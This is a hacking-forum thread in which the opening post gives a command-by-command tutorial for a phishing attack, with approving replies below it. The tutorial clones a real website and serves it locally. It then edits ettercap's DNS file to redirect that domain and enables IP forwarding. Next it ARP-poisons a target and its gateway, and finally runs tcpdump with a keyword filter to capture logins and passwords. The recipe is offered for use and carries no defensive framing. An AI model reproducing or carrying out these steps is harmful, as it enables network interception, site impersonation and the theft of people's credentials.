August 21, 2017, 08:45:47 PM
Welcome, Guest. Please login or register.

You Did *NOT* Just Win a Nigerian Lottery...

Author Topic: FAST TRACK "Simple phishing attack"  (Read 1750 times)

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
FAST TRACK "Simple phishing attack"
« on: March 22, 2016, 03:03:16 PM »

FAST TRACK "Simple phishing attack"
I remade a tutorial because I find it easier and cool

We will have an infrastructure like this, if

a pc "Attacker" a "gateway" and the "target"

########################
PHISHING MADE SIMPLE   #
########################

################################################################################################
MACHINE : PC XP (target) ; PC KALI (Attacker) ; Routeur (gateway)                              #
USED SOFTWARE : your web browser (i use iceweacel) ; ettercap                            #
ATTACKER OBJECTIF : Spoofing DNS for redirect Target to the fake web site                  #
################################################################################################

################################################################################################
#
Step 1 Download your fake web site with your browser

Create folder

mkdir /home/download/phishing
Go in your browser in "Saved pages" and down on the right handside Select "Web Page,complete"




You have a template for your  phishing.      
                                                      
Step 2 You must move the folder with the file html, you just download.                     
cd /var/www/                                                               
mv /home/download/phishing/website /var/www/website                                       
mv /home/download/phishing/website.html /var/www/index.html



Step 3 Start your web server with python in the file /var/www/
python -m SimpleHTTPService 80



################################################################################################

#START ATTACK SPOOF DNS               #

###########################################
#Modify the file : etter.dns for redirect fake website

leafpad /etc/ettercap/etter.dns


/etc/ettercap/etter.dns

ibuildapp.com      A   192.168.0.16
*.ibuildapp.com    A   192.168.0.16
www.ibuildapp.com  A   192.168.0.16



###########################################
#Active Forward
echo 1 > /proc/sys/net/ipv4/ip_forward


###########################################
#Start dns spoofing
ettercap -i  eth0 -T -q -P dns_spoof -M arp:remote /target/ /gateway/



#############################################
#Get login and password
tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20



#############################################
#The target go to ibuildapp.com and tape login and password
Go in your target





#############################################
#Look tcpdump filter





Yeah you have login and password !

End.

Thank you for reading me

Offline r3k0hu

  • Top Hat Member
  • Professional
  • ********
  • Posts: 482
  • Internets: +48/-0
Re: FAST TRACK "Simple phishing attack"
« Reply #1 on: March 23, 2016, 12:21:48 AM »
+1 RedCor - that's an awesome write up, well put together!! Thank you!

Going to give this a try in the weekend - keep up the great work!
r3k0hu
-43.9515-176.561

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
Re: FAST TRACK "Simple phishing attack"
« Reply #2 on: March 23, 2016, 02:55:39 AM »

Thank you r3k0hu for the +1 :) I prepare another tutorial on for and while loops

Offline H4v0K

  • Administrator
  • Elite
  • *****
  • Posts: 1019
  • Internets: +986/-1
Re: FAST TRACK "Simple phishing attack"
« Reply #3 on: March 23, 2016, 04:33:56 AM »
Very nice man thanks for posting  +1 :)

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
Re: FAST TRACK "Simple phishing attack"
« Reply #4 on: March 24, 2016, 07:41:28 AM »
Thank you  all readers

if you have any questions thank you to tell me, I do not use're sslstrip2 dnsproxy2 and because I wanted to make a simple redirect